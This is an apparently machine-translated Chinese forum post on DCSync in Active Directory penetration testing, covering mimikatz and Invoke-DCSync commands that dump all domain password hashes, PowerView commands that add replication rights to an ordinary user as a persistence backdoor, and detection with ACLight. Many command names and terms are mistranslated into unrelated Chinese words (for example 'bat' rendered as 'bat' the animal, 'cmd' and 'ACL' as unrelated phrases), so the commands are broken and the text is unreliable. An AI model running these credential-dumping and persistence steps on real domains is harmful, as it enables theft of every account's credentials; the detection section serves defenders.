发布于2022年11月8日3年前 0x00 前言 数据同步是域渗透中经常会用到的技术,本文会对开源的资料进行整理,结合自己的经验,总结利用和防御检测的方法 0x01 简介 本文将要介绍以下内容: 利用数据同步导出域内所有用户混杂的方法 利用数据同步在域内维持权限的方法 自动化检测数据同步后门的方法 0x02 利用DCSync导出域内所有用户hash的方法 数据同步是米米卡茨在2015年添加的一个功能,由本杰明德尔皮真蒂基维和文森特勒图共同编写,能够用来导出域内所有用户的混杂 利用条件: 获得以下任一用户的权限: 管理员组内的用户 域管理员组内的用户 企业管理员组内的用户 域控制器的计算机帐户 利用原理: 利用目录复制服务协议通过IDL_DRSGetNCChanges从域控制器复制用户凭据 参考资料: https://份文件。微软。com/en-us/open specs/windows _ protocols/ms-drsr/f 977 faaa-673 e-4f 66-b9bf-48c 640241d 47 实现代码: https://github。com/gentil kiwi/mimikatz/blob/master/mimikatz/modules/LSA转储/kuhl _ m _ LSA转储_ DC。c # L27 利用方法: 1.使用mimikatz 导出域内所有用户的哈希: mimikatz.exe的LSA转储:DC同步/域:测试。' com/all/CSV '退出 导出域内管理人员帐户的哈希: mimikatz.exe的LSA转储:DC同步/域:测试。' com/user:administrator/CSV '退出 2.powershell实现 https://gist.github.com/monoxgas/9d238accd969550136db 通过调用-反射注入调用mimikatz.dll中的数据同步功能 导出域内所有用户的哈希: invoke-DC同步转储林| ft-wrap-autosize 导出域内管理人员帐户的哈希: invoke-DC同步-转储林-用户@(' administrator ')| ft-wrap-autosize 注: 获得了域内用户的混杂后,进一步利用可参考之前的文章: 《域渗透——Pass The Hash的实现》 《渗透技巧——Pass the Hash with Remote Desktop(Restricted Admin mode)》 《域渗透——Pass The Hash Pass The Key》 0x03 利用DCSync在域内维持权限的方法 利用条件: 获得以下任一用户的权限: 域管理员组内的用户 企业管理员组内的用户 利用原理: 向域内的一个普通用户添加如下三条王牌(访问控制条目): DS-Replication-Get-Changes(GUID:1131 f6aa-9c 07-11 D1-f79f-00 c 04 fc 2d CD 2) DS-Replication-Get-Changes-All(GUID:1131 f6ad-9c 07-11 D1-f79f-00 c 04 fc 2d CD 2) DS-Replication-Get-Changes(GUID:89 e95b 76-444d-4c 62-991 a-0 facbeda 640 c) 该用户即可获得利用数据同步导出域内所有用户混杂的权限 实现代码: https://github。com/powershell mafia/powers loit/blob/dev/Recon/power view。PS1 # l 8270 利用方法: 添加(美国电影编辑)美国电影电视剪接师协会的命令如下: add-DomainObjectAcl-目标标识' DC=测试,DC=com '-principalidientity测试1-权限DC同步-详细 补充: 删除(美国电影编辑)美国电影电视剪接师协会的命令: remove-DomainObjectAcl-目标标识' DC=测试,DC=com '-principalidientity测试1-权限DC同步-详细 注: 关于更多前十字韧带的内容可参考之前的文章: 《渗透技巧——Windows下的Access Control List》 使用域用户测试一调用数据同步的方法如下: 1.在域内一台登录了test1用户的主机上面,直接使用mimikatz的DCSync功能 mimikatz.exe特权*调试' LSA转储:DC同步/域:测试。' com/all/CSV '退出 2.使用runas实现登录test1用户,再使用DCSync (1)弹出煤矿管理局 echo 123456789 | runas/no profile/user:test \ test1 cmd 弹出的煤矿管理局下执行如下命令: mimikatz.exe特权*调试' LSA转储:DC同步/域:测试。' com/all/CSV '退出 (2)不弹框实现 echo 123456789 | runas/no profile/user:test \ test1 c:\ test \ 1。蝙蝠 1 .蝙蝠的内容如下: c:\ test \ mimikatz。LSA转储:DC同步/域:测试。com/user:administrator/CSV ' exitc:\ test \ 1。文本文件(textfile) 注: 同类的工具还有伊斯鲁纳斯和CPAU 3.使用powershell实现登录test1用户,再使用DCSync (1)弹出煤矿管理局 $uname='test\test1 ' $ pwd=convert to-secure string ' 12345678 '-AsPlainTextForce $ cred=新对象系统管理。自动化。PS证书(uname,$pwd) 开始进程文件路径。' exe '-凭据美元信用 弹出的煤矿管理局下执行如下命令: mimikatz.exe权限*调试' LSA转储:DC同步/域:测试。' com/user:administrator/CSV '退出 (2)不弹框实现 $uname='test\test1 ' $ pwd=convert to-secure string ' 12345678 '-AsPlainTextForce $ cred=新对象系统管理。自动化。PS证书(uname,$pwd) 启动进程文件路径“c:\ test \ 1。' bat '-凭证$ cred 1 .蝙蝠的内容如下: c:\ test \ mimikatz。LSA转储:DC同步/域:测试。com/user:administrator/CSV ' exitc:\ test \ 1。文本文件(textfile) 注: 使用wmic在本机实现登录用户测试一会失败,错误如下: 错误: 描述=用户凭据不能用于本地连接 0x04 自动化检测DCSync后门的方法 具有高权限但不在高权限组的用户被称之为影子管理员,例如0x03中的域用户测试1,仅通过查询高权限组的成员无法发现域内的影子管理员 检测原理: 枚举活动目录中所有用户的ACL,标记出特权帐户 实现代码: https://github.com/cyberark/ACLight 利用条件: Powershell v3.0版版 域内普通用户权限 检测方法: 执行项目中的执行-a灯2。蝙蝠 生成三个文件: 特权账户-图层分析。文本文件(textfile) 特权帐户权限-最终报告。战斗支援车 特权账户权限-非正规账户。战斗支援车 文件中会显示出所有特权帐户 经测试,一盏灯能够检测出被添加数据同步权限的用户测试一 0x05 小结 本文介绍了域渗透中数据同步的利用和自动化检测的方法,站在防御的角度,建议使用一盏明灯对域环境的用户前十字韧带进行检测 留下回复
.thumb.jpg.26764a69083eb4469b6d18365588b559.jpg)
创建帐户或登录后发表意见